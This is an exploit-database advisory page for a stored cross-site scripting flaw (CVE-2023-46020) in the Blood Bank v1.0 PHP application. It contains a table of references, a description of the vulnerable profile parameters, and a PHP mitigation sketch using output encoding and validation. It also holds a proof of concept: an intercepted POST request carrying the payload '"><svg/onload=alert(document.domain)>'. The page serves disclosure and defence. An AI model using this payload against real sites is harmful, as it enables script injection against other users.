| Title | Published | Views | Reporter |
|---|---|---|---|
| CVE-2023-46020 | 13 Nov 2023 23:15 | – | attackerkb |
| Exploit for Cross-site Scripting in Code-Projects Blood_Bank | 11 Nov 2023 08:37 | – | githubexploit |
| Code-Projects Blood Bank Cross-Site Scripting Vulnerability | 13 Nov 2023 00:00 | – | cnnvd |
| CVE-2023-46020 | 13 Nov 2023 00:00 | – | cve |
| CVE-2023-46020 | 13 Nov 2023 00:00 | – | cvelist |
| EUVD-2023-50282 | 3 Oct 2025 20:07 | – | euvd |
| CVE-2023-46020 | 13 Nov 2023 23:15 | – | nvd |
| CVE-2023-46020 | 13 Nov 2023 23:15 | – | osv |
| Blood Bank 1.0 Cross Site Scripting | 2 Apr 2024 00:00 | – | packetstorm |
| Cross site scripting | 13 Nov 2023 23:15 | – | prion |

# Exploit Title: Blood Bank v1.0 Stored Cross Site Scripting (XSS)
# Date: 2023-11-14
# Exploit Author: Ersin Erenler
# Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code
# Software Link: https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip
# Version: 1.0
# Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0
# CVE : CVE-2023-46020
-------------------------------------------------------------------------------
# Description:
The parameters rname, remail, rphone, and rcity in the /file/updateprofile.php file of Code-Projects Blood Bank V1.0 are susceptible to Stored Cross-Site Scripting (XSS). The vulnerability arises from insufficient input validation and sanitization of user-supplied data. An attacker can inject malicious scripts into these parameters; once stored on the server, the scripts may execute when other users view the affected user's profile.
Vulnerable File: updateprofile.php
Parameters: rname, remail, rphone, rcity
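
A mitigation sketch for the weakness described above, added here as an example; it is not code from Blood Bank or from the advisory author. The function names `e()` and `validateProfile()`, the validation patterns, and the assumption that the profile page echoes the stored value into a quoted `value` attribute are all hypothetical.

```php
<?php
declare(strict_types=1);

// Hypothetical helper (not from Blood Bank's source): encode a stored value
// for HTML text and quoted-attribute contexts.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Hypothetical allow-list validation for the four parameters named in the
// advisory. The patterns are assumptions; adjust them to the data you accept.
function validateProfile(array $post): array
{
    $rules = [
        'rname'  => '/^[\p{L}\p{M} .\'-]{1,60}$/u',
        'rphone' => '/^\+?[0-9]{7,15}$/',
        'rcity'  => '/^[\p{L}\p{M} .\'-]{1,60}$/u',
    ];
    $errors = [];
    foreach ($rules as $field => $pattern) {
        $value = $post[$field] ?? null;
        if (!is_string($value) || preg_match($pattern, $value) !== 1) {
            $errors[] = $field;
        }
    }
    $email = $post['remail'] ?? null;
    if (!is_string($email) || filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        $errors[] = 'remail';
    }
    return $errors; // names of the fields that must be rejected
}

// Constructed sample input modelled on the request body in the PoC.
$post = [
    'rname'  => 'test"><svg/onload=alert(document.domain)>',
    'remail' => 'test@gmail.com',
    'rphone' => '8875643456',
    'rcity'  => 'lucknow',
];

// 1. Validate on write, before the profile UPDATE is executed.
var_dump(validateProfile($post));

// 2. Encode on read, so values stored before the fix are rendered inert
//    inside the (assumed) quoted value attribute of the profile form.
printf('<input type="text" name="rname" value="%s">' . PHP_EOL, e($post['rname']));
```

Output encoding at render time is the control that closes the stored XSS; the allow-list validation is defence in depth and does not neutralise rows already in the database.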
# Proof of Concept:
----------------------
1. Intercept the POST request to updateprofile.php via Burp Suite
2. Inject the payload to the vulnerable parameters
3. Payload: "><svg/onload=alert(document.domain)>
4. Example request for rname parameter:
---
POST /bloodbank/file/updateprofile.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 103
Origin: http://localhost
Connection: close
Referer: http://localhost/bloodbank/rprofile.php?id=1
Cookie: PHPSESSID=<some-cookie-value>
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

rname=test"><svg/onload=alert(document.domain)>&remail=test%40gmail.com&rpassword=test&rphone=8875643456&rcity=lucknow&bg=A%2B&update=Update
----
5. Go to the profile page and trigger the XSS
XSS Payload:
"><svg/onload=alert(document.domain)>